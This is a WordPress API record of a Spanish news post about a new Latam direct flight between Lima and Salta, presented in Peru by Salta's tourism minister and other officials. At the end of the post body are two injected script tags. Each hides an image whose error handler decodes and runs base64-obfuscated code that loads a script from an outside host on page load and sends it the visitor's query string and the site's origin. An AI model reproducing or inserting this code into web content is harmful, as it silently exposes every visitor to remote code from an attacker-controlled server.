{"id":3119,"date":"2023-09-20T21:16:55","date_gmt":"2023-09-21T00:16:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3119"},"modified":"2025-08-14T00:08:15","modified_gmt":"2025-08-14T03:08:15","slug":"el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3119","title":{"rendered":"El vuelo directo entre Lima y Salta apuntalar\u00e1 la integraci\u00f3n regional"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#b00e56\"><strong><em>La ruta que comenzar\u00e1 a operar el 1 de diciembre con tres frecuencias semanales, fue presentada en Per\u00fa ante agentes de viajes. Ser\u00e1 una nueva conexi\u00f3n para que turistas del mundo lleguen a la provincia.<\/em><\/strong><\/h4>\n\n\n\n<p>El Gobierno de Salta, autoridades nacionales y la empresa Latam presentaron en Per\u00fa la ruta a\u00e9rea entre Lima y Salta que comenzar\u00e1 a operar desde el 1 de diciembre con tres frecuencias semanales y cuyos tickets ya est\u00e1n a la venta.<br><br>Esta ruta permitir\u00e1 que el mundo est\u00e9 m\u00e1s conectado con Argentina siendo Salta la puerta de entrada al pa\u00eds y se complementar\u00e1 con la ruta internacional desde San Pablo, Brasil.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8963-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional.jpeg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8963-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional.jpeg\" alt=\"El vuelo directo entre Lima y Salta apuntalar\u00e1 la integraci\u00f3n regional\" width=\"338\" height=\"234\"\/><\/a><\/figure><\/div>\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>, represent\u00f3 a la provincia en el evento al que asistieron agencias de viaje argentinas y peruanas que tendr\u00e1n una nueva opci\u00f3n de venta para el ingreso a la Argentina. Tambi\u00e9n lo hicieron el embajador de Argentina en Per\u00fa,&nbsp;<strong>Enrique Vaca Narvaja<\/strong>, el presidente de Inprotur Ricardo Sosa y el gerente general de Latam Per\u00fa, Manuel Van Oordt.<\/p>\n\n\n\n<p>&nbsp;\u201cLes quiero transmitir el saludo y agradecimiento del gobernador Gustavo S\u00e1enz, quien es un claro defensor de la integraci\u00f3n y del turismo como una herramienta para el desarrollo de los pueblos\u201d, dijo el ministro Pe\u00f1a. &nbsp; El funcionario destac\u00f3 como fortaleza \u201cla gran hospitalidad de los salte\u00f1os porque sabemos que el turismo es desarrollo, es empleo y progreso; nuestro destino ofrece los mejores servicios, cuenta con paisajes \u00fanicos y una calidez inigualable de nuestra gente\u201d, indic\u00f3.<\/p>\n\n\n\n<p>Con respecto a la nueva ruta, indic\u00f3 que permitir\u00e1 trabajar en pa\u00edses que tiene vinculaci\u00f3n con Per\u00fa, como lo son Colombia, M\u00e9xico y Estados Unidos. \u201cEs una puerta m\u00e1s desde Salta para la regi\u00f3n y el mundo\u201d, se\u00f1al\u00f3. En un trabajo conjunto con Latam y Naci\u00f3n, la pr\u00f3xima semana se realizar\u00e1 la misma presentaci\u00f3n en Casa de Salta en Buenos Aires.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8964-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8964-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional.jpeg\" alt=\"El vuelo directo entre Lima y Salta apuntalar\u00e1 la integraci\u00f3n regional\" width=\"355\" height=\"265\"\/><\/a><\/figure><\/div>\n\n\n<p>Asimismo, en octubre est\u00e1 previsto el Workshop de la Asociaci\u00f3n Salte\u00f1a de Agencias de Viaje; la provincia recibir\u00e1 en este marco a agentes juje\u00f1os y tucumanos en un trabajo en conjunto para que este vuelo estrat\u00e9gico inicie en diciembre sus operaciones con alto nivel de ocupaci\u00f3n.<\/p>\n\n\n\n<p>El gerente de Latam Per\u00fa invit\u00f3 a continuar promocionado esta ruta a\u00e9rea que beneficia el turismo, el comercio y la integraci\u00f3n de nuestros pueblos, \u201cdesde nuestra parte, llevando m\u00e1s turistas a conocer Salta y Argentina y que m\u00e1s salte\u00f1os puedan conocer las maravillas del Per\u00fa\u201d.<\/p>\n\n\n\n<p>El embajador Vaca Narvaja destac\u00f3 la vinculaci\u00f3n comercial, cultural y tur\u00edstica de los pa\u00edses y la importancia de seguir sumando rutas a la Argentina, en este caso a la provincia de Salta. Por su parte, Ricardo Sosa felicit\u00f3 la gesti\u00f3n del gobernador Gustavo S\u00e1enz para la recuperaci\u00f3n de esta ruta hist\u00f3rica para la regi\u00f3n. Adem\u00e1s, destac\u00f3 la posibilidad de crecer que tiene el pa\u00eds en materia de turismo receptivo.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"800\" height=\"600\" data-id=\"3120\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4641-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-20230920171243.jpeg\" alt=\"\" class=\"wp-image-3120\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4641-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-20230920171243.jpeg 800w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4641-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-20230920171243-300x225.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4641-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-20230920171243-768x576.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4641-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-20230920171243-696x522.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4641-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-20230920171243-560x420.jpeg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4641-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-20230920171243-80x60.jpeg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4641-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-20230920171243-265x198.jpeg 265w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"560\" height=\"420\" data-id=\"3121\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/91921-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional.jpeg\" alt=\"\" class=\"wp-image-3121\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/91921-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional.jpeg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/91921-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-300x225.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/91921-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-80x60.jpeg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/91921-el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-265x198.jpeg 265w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-vuelo-directo-entre-lima-y-salta-apuntalara-la-integracion-regional-91921\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La ruta que comenzar\u00e1 a operar el 1 de diciembre con tres frecuencias semanales, fue presentada en Per\u00fa ante agentes de viajes. Ser\u00e1 una nueva conexi\u00f3n para que turistas del mundo lleguen a la provincia. El Gobierno de Salta, autoridades nacionales y la empresa Latam presentaron en Per\u00fa la ruta a\u00e9rea entre Lima y Salta [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3121,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5,18],"tags":[],"class_list":{"0":"post-3119","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3119"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3119"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3119\/revisions"}],"predecessor-version":[{"id":6961,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3119\/revisions\/6961"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3121"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3119"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3119"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3119"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}